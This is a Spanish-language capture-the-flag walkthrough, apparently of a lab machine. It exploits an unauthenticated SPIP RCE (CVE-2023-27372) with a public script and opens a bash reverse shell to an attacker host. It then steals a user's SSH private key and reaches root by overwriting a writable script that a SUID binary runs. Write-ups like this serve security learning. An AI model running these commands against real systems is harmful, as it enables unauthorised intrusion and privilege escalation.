Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.26
❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.26
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-10 10:38 -04
Nmap scan report for 192.168.1.26
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Publisher's Pulse: SPIP Insights & Tips
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelEnumerando damos con /spip, una instalación de SPIP. El htaccess.txt confirma la versión 4.2, vulnerable a RCE no autenticado (CVE-2023-27372):
❯ gobuster dir -u 'http://192.168.1.26/spip' -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,gif,zip -r
...
/htaccess.txt (Status: 200) [Size: 4307]
/ecrire (Status: 200) [Size: 12193]
...
❯ searchsploit spip 4.2
...
SPIP v4.2.0 - Remote Code Execution (Unauthenticated) | php/webapps/51536.py
...Confirmamos la ejecución (sin salida visible) y lanzamos una reverse shell:
❯ python3 51536.py -u http://192.168.1.26/spip -c 'sleep 5' -v
[+] Anti-CSRF token found : ...
[+] Execute this payload : s:27:"<?php system('sleep 5'); ?>";
❯ python3 51536.py -u http://192.168.1.26/spip -c 'bash -c "bash -i >& /dev/tcp/192.168.1.5/1234 0>&1"'
❯ ncat -nlvp 1234
Ncat: Connection from 192.168.1.26:48496.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@41c976e507f8:/home/think/spip/spip$En el home de think podemos leer su id_rsa:
www-data@41c976e507f8:/home/think/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
❯ ssh think@192.168.1.26 -i id_rsa_think
think@publisher:~$Obtenemos la primera flag. Buscamos binarios SUID y encontramos run_container, que ejecuta /opt/run_container.sh (escribible):
think@publisher:/opt$ find / -perm -4000 2>/dev/null
...
/usr/sbin/run_container
...
think@publisher:/opt$ strings /usr/sbin/run_container
...
/opt/run_container.sh
...
think@publisher:/opt$ ls -l /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Mar 29 13:25 /opt/run_container.sh/opt no es listable directamente, pero podemos saltarnos los permisos invocando el binario a través del loader dinámico:
think@publisher:/usr$ /lib64/ld-linux-x86-64.so.2 /bin/bash
think@publisher:/opt$ ls -la
total 20
-rwxrwxrwx 1 root root 1715 Mar 29 13:25 run_container.shReemplazamos el script por un chmod u+s /bin/bash y disparamos el binario SUID:
think@publisher:/opt$ echo "chmod u+s /bin/bash" > run_container.sh
think@publisher:/tmp$ run_container
think@publisher:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
think@publisher:/tmp$ bash -p
bash-5.0# whoami
rootObtenemos nuestra flag.
Fin.